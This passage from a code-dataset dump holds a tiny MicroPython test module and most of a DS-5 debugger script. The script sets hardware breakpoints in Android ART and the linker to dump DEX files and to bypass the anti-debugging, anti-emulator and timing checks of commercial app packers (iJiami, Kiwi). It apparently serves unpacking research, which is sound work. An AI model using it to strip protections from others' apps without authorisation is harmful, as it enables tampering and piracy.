9e67bdd291cb5489e20c59abc6e700021abd2ddc
| 25
|
py
|
Python
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
def foo():
    """Return the constant 42 (used by the import tests)."""
    return 42
| 8.333333
| 13
| 0.56
| 4
| 25
| 3.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.32
| 25
| 2
| 14
| 12.5
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9e98ec501774bc3f6687aeee4783da403eaeafa0
| 36,258
|
py
|
Python
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 32
|
2021-04-08T05:39:51.000Z
|
2022-03-31T03:49:35.000Z
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 2
|
2021-04-14T08:31:30.000Z
|
2021-08-29T19:12:09.000Z
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 3
|
2021-06-08T08:52:56.000Z
|
2021-06-23T17:28:51.000Z
|
# DexFile.py is used to dump the dex file when the "DexFile::<init>" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item
# Obtain the DS-5 debugger handle and the current execution context; every
# setup function below issues its DS commands through this context object.
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
# define the analyzing configuration related to online tracing module
def online_tracing(pid):
"""Arm the online-tracing breakpoints for process *pid*.

Plants per-process hardware breakpoints on the linker's ``do_dlopen`` and on
a fixed kernel-space (EL1N) cache-flush address, then binds each breakpoint
to its handler script from ``config``.  The mmap/munmap pairs are kept
commented out as an optional extension.
"""
# define the breakpoints
# .replace('L', '') strips the trailing 'L' Python 2's hex() appends to longs,
# so DS-5 receives a plain hex address.
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_clear_cache_cmd)
# brk_mmap_cmd = "hbreak" + " " + str(hex(config.brk_mmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_mmap_cmd)
# brk_munmap_cmd = "hbreak" + " " + str(hex(config.brk_munmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_munmap_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# User-space breakpoints are matched on the low 32 bits of the address.
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
# The kernel cache-flush breakpoint is matched on the full 64-bit address
# (Python 2 long literal).
if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
execution_state.executeDSCommand(bs_clear_cache_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_mmap:
# bs_mmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.mmap_script)
# execution_state.executeDSCommand(bs_mmap_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_munmap:
# bs_munmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.munmap_script)
# execution_state.executeDSCommand(bs_munmap_cmd)
# brk_object.enable()
# Analyzing configuration for the DexFile loading path.
def dex_setup(pid):
    """Install the DexFile breakpoint for process *pid* and bind its script."""
    pid_ctx = str(hex(pid)).replace('L', '')
    # Per-process hardware breakpoint on the DexFile constructor address.
    hbreak_cmd = " ".join(["hbreak", str(hex(config.brk_DexFile)).replace('L', ''), "context", pid_ctx])
    execution_state.executeDSCommand(hbreak_cmd)
    # Attach the dump script to the matching breakpoint and enable it.
    service = execution_state.getBreakpointService()
    for i in range(service.getBreakpointCount()):
        bp = service.getBreakpoint(i)
        if (int(bp.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile:
            script_cmd = " ".join(["break-script", str(bp.getId()), os.path.join(config.workspace, config.script_directory, config.DexFile_script)])
            execution_state.executeDSCommand(script_cmd)
            bp.enable()
# define the analyzing configuration related to the Java execution flow
def je_setup(pid):
"""Arm the Java-execution-flow breakpoints for process *pid*.

Live breakpoints: ArtQuickToInterpreterBridge, DoCall and
InvokeWithArgArray; the interpreter/compiled-code bridges and the generic
JNI trampoline are kept commented out as alternates.  Each live breakpoint
is then bound to its handler script from ``config`` and enabled.
"""
# define the breakpoints
brk_ArtQuickToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickToInterpreterBridge_cmd)
# brk_ArtInterpreterToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToInterpreterBridge_cmd)
# brk_ArtInterpreterToCompiledCodeBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToCompiledCodeBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToCompiledCodeBridge_cmd)
brk_DoCall_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DoCall_cmd)
# brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_InvokeWithArgArray_cmd = "hbreak" + " " + str(hex(config.brk_InvokeWithArgArray)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_InvokeWithArgArray_cmd)
# define the breakpoint scripts
# Match each installed breakpoint by its low 32 address bits and bind the
# corresponding handler script.
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickToInterpreterBridge:
bs_ArtQuickToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickToInterpreterBridge_script)
execution_state.executeDSCommand(bs_ArtQuickToInterpreterBridge_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToInterpreterBridge:
# bs_ArtInterpreterToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToInterpreterBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToInterpreterBridge_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToCompiledCodeBridge:
# bs_ArtInterpreterToCompiledCodeBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToCompiledCodeBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToCompiledCodeBridge_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_DoCall_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DoCall_script)
execution_state.executeDSCommand(bs_DoCall_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
# bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
# execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_InvokeWithArgArray:
bs_InvokeWithArgArray_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.InvokeWithArgArray_script)
execution_state.executeDSCommand(bs_InvokeWithArgArray_cmd)
brk_object.enable()
# define the analyzing configuration related to the Native execution flow
def ne_setup(pid):
"""Arm the native-execution-flow (JNI method) breakpoints for *pid*.

Live breakpoints: ArtQuickGenericJniTrampoline (JNI method entry) and
GenericJniMethodEnd (JNI method exit).  The JNI_onLoad /
LoadNativeLibrary hooks are kept commented out as alternates.
"""
# define the breakpoints
# - JNI_onLoad - #
# brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_LoadNativeLibrary_cmd)
# brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
# - JNI method - #
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_GenericJniMethodEnd_cmd = "hbreak" + " " + str(hex(config.brk_GenericJniMethodEnd)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_GenericJniMethodEnd_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# - JNI_onLoad - #
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadNativeLibrary:
# bs_LoadNativeLibrary_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
# execution_state.executeDSCommand(bs_LoadNativeLibrary_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
# bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
# execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
# brk_object.enable()
# - JNI method - #
# Match on the low 32 address bits and bind the handler scripts.
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_GenericJniMethodEnd:
bs_GenericJniMethodEnd_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.GenericJniMethodEnd_script)
execution_state.executeDSCommand(bs_GenericJniMethodEnd_cmd)
brk_object.enable()
# define the analyzing configuration related to the linker
def linker_setup(pid):
"""Arm the linker-related breakpoint (RegisterNatives) for process *pid*.

Only RegisterNatives is live; the do_dlopen / JNI_onLoad / kernel
cache-flush hooks are kept commented out as alternates.
"""
# define the breakpoints
# brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_do_dlopen_cmd)
# brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
brk_RegisterNatives_cmd = "hbreak" + " " + str(hex(config.brk_RegisterNatives)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_RegisterNatives_cmd)
# brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_clear_cache_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
# bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
# execution_state.executeDSCommand(bs_do_dlopen_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
# bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
# execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_RegisterNatives:
bs_RegisterNatives_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.RegisterNatives_script)
execution_state.executeDSCommand(bs_RegisterNatives_cmd)
brk_object.enable()
# NOTE(review): if the block below is ever re-enabled, it executes
# 'bs_cacheflush_cmd' while the variable it defines is 'bs_clear_cache_cmd'
# — fix the name before uncommenting.
# if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
# bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
# execution_state.executeDSCommand(bs_cacheflush_cmd)
# brk_object.enable()
# ---- #
# ADG
def anti_debugging(pid):
    """Install the ADG breakpoints (do_dlopen, fopen) for process *pid*.

    Plants per-process hardware breakpoints and binds each one to its
    handler script from ``config`` (fopen uses the ADG variant script).
    """
    pid_ctx = str(hex(pid)).replace('L', '')
    dlopen_cmd = " ".join(["hbreak", str(hex(config.brk_do_dlopen)).replace('L', ''), "context", pid_ctx])
    execution_state.executeDSCommand(dlopen_cmd)
    fopen_cmd = " ".join(["hbreak", str(hex(config.brk_fopen)).replace('L', ''), "context", pid_ctx])
    execution_state.executeDSCommand(fopen_cmd)
    # Bind each installed breakpoint (matched on the low 32 address bits) to
    # its script and enable it.
    service = execution_state.getBreakpointService()
    for i in range(service.getBreakpointCount()):
        bp = service.getBreakpoint(i)
        addr = int(bp.getAddresses()[0]) & 0xffffffff
        if addr == config.brk_do_dlopen:
            cmd = " ".join(["break-script", str(bp.getId()), os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)])
            execution_state.executeDSCommand(cmd)
            bp.enable()
        if addr == config.brk_fopen:
            cmd = " ".join(["break-script", str(bp.getId()), os.path.join(config.workspace, config.script_directory, config.fopen_adg_script)])
            execution_state.executeDSCommand(cmd)
            bp.enable()
# AEU
def anti_emulator(pid):
"""Arm the AEU breakpoints (do_dlopen, fopen, __system_property_get) for *pid*.

Each breakpoint is scoped to the process context and bound to its handler
script from ``config`` (fopen uses the AEU variant script).
"""
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_fopen_cmd = "hbreak" + " " + str(hex(config.brk_fopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_fopen_cmd)
brk_system_property_get = "hbreak" + " " + str(hex(config.brk_system_property_get)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_system_property_get)
# define the breakpoint scripts
# Match each installed breakpoint on its low 32 address bits.
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_fopen:
bs_fopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.fopen_aeu_script)
execution_state.executeDSCommand(bs_fopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_system_property_get:
bs_system_property_get_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.system_property_get_script)
execution_state.executeDSCommand(bs_system_property_get_cmd)
brk_object.enable()
# ADI
def anti_instrumentation(pid):
    """Install the ADI breakpoints (do_dlopen, fopen) for process *pid*.

    Same shape as the ADG setup, but fopen is bound to the ADI variant
    script from ``config``.
    """
    pid_ctx = str(hex(pid)).replace('L', '')

    def _hbreak(address):
        # Plant a hardware breakpoint at *address*, scoped to this process.
        execution_state.executeDSCommand("hbreak" + " " + str(hex(address)).replace('L', '') + " " + "context" + " " + pid_ctx)

    def _attach(bp, script_name):
        # Bind *bp* to its breakpoint script and switch it on.
        execution_state.executeDSCommand("break-script" + " " + str(bp.getId()) + " " + os.path.join(config.workspace, config.script_directory, script_name))
        bp.enable()

    _hbreak(config.brk_do_dlopen)
    _hbreak(config.brk_fopen)
    for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
        bp = execution_state.getBreakpointService().getBreakpoint(idx)
        if (int(bp.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
            _attach(bp, config.do_dlopen_script)
        if (int(bp.getAddresses()[0]) & 0xffffffff) == config.brk_fopen:
            _attach(bp, config.fopen_adi_script)
# TCK (gettimeofday for ijiami, time for qihoo)
def time_checking_setup(pid):
    """Install the time-check breakpoint on gettimeofday for process *pid*.

    The time()-based variant (qihoo) is kept commented out below.
    """
    pid_ctx = str(hex(pid)).replace('L', '')
    hbreak_cmd = " ".join(["hbreak", str(hex(config.brk_gettimeofday)).replace('L', ''), "context", pid_ctx])
    execution_state.executeDSCommand(hbreak_cmd)
    # brk_time_cmd = "hbreak" + " " + str(hex(config.brk_time)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
    # execution_state.executeDSCommand(brk_time_cmd)
    # Bind the handler script to the matching breakpoint and enable it.
    service = execution_state.getBreakpointService()
    for i in range(service.getBreakpointCount()):
        bp = service.getBreakpoint(i)
        if (int(bp.getAddresses()[0]) & 0xffffffff) == config.brk_gettimeofday:
            script_cmd = " ".join(["break-script", str(bp.getId()), os.path.join(config.workspace, config.script_directory, config.gettimeofday_script)])
            execution_state.executeDSCommand(script_cmd)
            bp.enable()
        # if (int(bp.getAddresses()[0]) & 0xffffffff) == config.brk_time:
        #     bs_time_cmd = "break-script" + " " + str(bp.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.time_script)
        #     execution_state.executeDSCommand(bs_time_cmd)
        #     bp.enable()
# SLH
def system_library_hooking_setup(pid):
"""Arm the SLH breakpoints for process *pid*.

Live breakpoints: linker do_dlopen and the fixed kernel-space (EL1N)
cache-flush address; the mmap/munmap pairs are kept commented out.
"""
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_clear_cache_cmd)
# brk_mmap_cmd = "hbreak" + " " + str(hex(config.brk_mmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_mmap_cmd)
# brk_munmap_cmd = "hbreak" + " " + str(hex(config.brk_munmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_munmap_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
# The kernel breakpoint is matched on the full 64-bit address (Python 2 long).
if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
execution_state.executeDSCommand(bs_clear_cache_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_mmap:
# bs_mmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.mmap_script)
# execution_state.executeDSCommand(bs_mmap_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_munmap:
# bs_munmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.munmap_script)
# execution_state.executeDSCommand(bs_munmap_cmd)
# brk_object.enable()
# ---- #
def art_object_modification_setup(pid):
"""Arm the ART-object-modification breakpoints for process *pid*.

Live breakpoints: do_dlopen, LoadClassMembers and LoadMethod, each bound
to its handler script from ``config``.
"""
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_LoadClassMembers_cmd = "hbreak" + " " + str(hex(config.brk_LoadClassMembers)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadClassMembers_cmd)
brk_LoadMethod_cmd = "hbreak" + " " + str(hex(config.brk_LoadMethod)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadMethod_cmd)
# define the breakpoint scripts
# Match each installed breakpoint on its low 32 address bits.
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadClassMembers:
bs_LoadClassMembers_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadClassMembers_script)
execution_state.executeDSCommand(bs_LoadClassMembers_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
bs_LoadMethod_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadMethod_script)
execution_state.executeDSCommand(bs_LoadMethod_cmd)
brk_object.enable()
def force_art_object_modification_setup(pid):
    """Install hardware breakpoints for forced ART-object-modification tracing.

    Variant of art_object_modification_setup used for the iJiami packer:
    breaks on do_dlopen, FindClass (iJiami-specific script) and LoadMethod in
    the context of process *pid*, attaching and enabling a script per break.
    """
    def _addr(value):
        # Strip the trailing 'L' that hex() appends to Python 2 longs.
        return hex(value).replace('L', '')

    def _attach_script(brk, script_name):
        # Bind a breakpoint-script file to the breakpoint and enable it.
        script = os.path.join(config.workspace, config.script_directory, script_name)
        execution_state.executeDSCommand("break-script" + " " + str(brk.getId()) + " " + script)
        brk.enable()

    # (address, script) pairs handled by this setup routine.
    targets = [
        (config.brk_do_dlopen, config.do_dlopen_script),
        (config.brk_FindClass, config.FindClass_ijiami_script),
        (config.brk_LoadMethod, config.LoadMethod_script),
    ]
    # define the breakpoints
    for address, _ in targets:
        execution_state.executeDSCommand("hbreak" + " " + _addr(address) + " " + "context" + " " + _addr(pid))
    # define the breakpoint scripts
    service = execution_state.getBreakpointService()
    for idx in range(service.getBreakpointCount()):
        brk = service.getBreakpoint(idx)
        low_addr = int(brk.getAddresses()[0]) & 0xffffffff
        for address, script_name in targets:
            if low_addr == address:
                _attach_script(brk, script_name)
def class_modification_setup(pid):
    """Break on DoCall in the context of *pid* and attach the
    class-modification breakpoint script."""
    # define the breakpoint (hex() may leave a trailing 'L' on py2 longs)
    command = "hbreak %s context %s" % (hex(config.brk_DoCall).replace('L', ''),
                                        hex(pid).replace('L', ''))
    execution_state.executeDSCommand(command)
    # define the breakpoint script
    service = execution_state.getBreakpointService()
    for index in range(service.getBreakpointCount()):
        candidate = service.getBreakpoint(index)
        if (int(candidate.getAddresses()[0]) & 0xffffffff) != config.brk_DoCall:
            continue
        script = os.path.join(config.workspace, config.script_directory,
                              config.ClassModification_script)
        execution_state.executeDSCommand("break-script %s %s" % (candidate.getId(), script))
        candidate.enable()
def force_class_modification_setup(pid):
    """Break on FindClass and InitClass (Kiwi packer variant) in the context
    of *pid* and attach the Kiwi-specific breakpoint scripts."""
    def _script_cmd(brk, script_name):
        # Build the break-script command binding *script_name* to *brk*.
        script = os.path.join(config.workspace, config.script_directory, script_name)
        return "break-script %s %s" % (brk.getId(), script)

    # define the breakpoints
    for address in (config.brk_FindClass, config.brk_InitClass):
        execution_state.executeDSCommand(
            "hbreak %s context %s" % (hex(address).replace('L', ''),
                                      hex(pid).replace('L', '')))
    # define the breakpoint scripts
    service = execution_state.getBreakpointService()
    for index in range(service.getBreakpointCount()):
        candidate = service.getBreakpoint(index)
        low_addr = int(candidate.getAddresses()[0]) & 0xffffffff
        if low_addr == config.brk_FindClass:
            execution_state.executeDSCommand(_script_cmd(candidate, config.FindClass_kiwi_script))
            candidate.enable()
        if low_addr == config.brk_InitClass:
            execution_state.executeDSCommand(_script_cmd(candidate, config.InitClass_kiwi_script))
            # NOTE(review): InitClass is left disabled, unlike every other
            # breakpoint here — presumably toggled on later by the FindClass
            # script; confirm before changing.
            candidate.disable()
# ---- #
def unpack_baidu_2018(pid):
    # Placeholder: no dedicated Baidu-2018 handling implemented yet.
    pass

def unpack_bangcle_2018(pid):
    # Placeholder: no dedicated Bangcle-2018 handling implemented yet.
    pass

def unpack_ijiami_2018(pid):
    # iJiami 2018: bypass its time checks and force ART-object tracing.
    time_checking_setup(pid)
    force_art_object_modification_setup(pid)

def unpack_kiwi_2018(pid):
    # Kiwi 2018: forced class-modification tracing only.
    force_class_modification_setup(pid)

def unpack_qihoo_2018(pid):
    # Placeholder: no dedicated Qihoo-2018 handling implemented yet.
    pass

def unpack_tencent_2018(pid):
    # Placeholder: no dedicated Tencent-2018 handling implemented yet.
    pass
# ---- #
# performance
def cf_bench(pid):
    """Breakpoint setup used for performance benchmarking: breaks on
    LoadNativeLibrary and do_dlopen (process-wide) and clock_gettime
    (context of *pid*), attaching a script to each."""
    def _strip(value):
        # Drop the trailing 'L' that py2 hex() appends to longs.
        return hex(value).replace('L', '')

    # define the breakpoints (the first two intentionally have no context
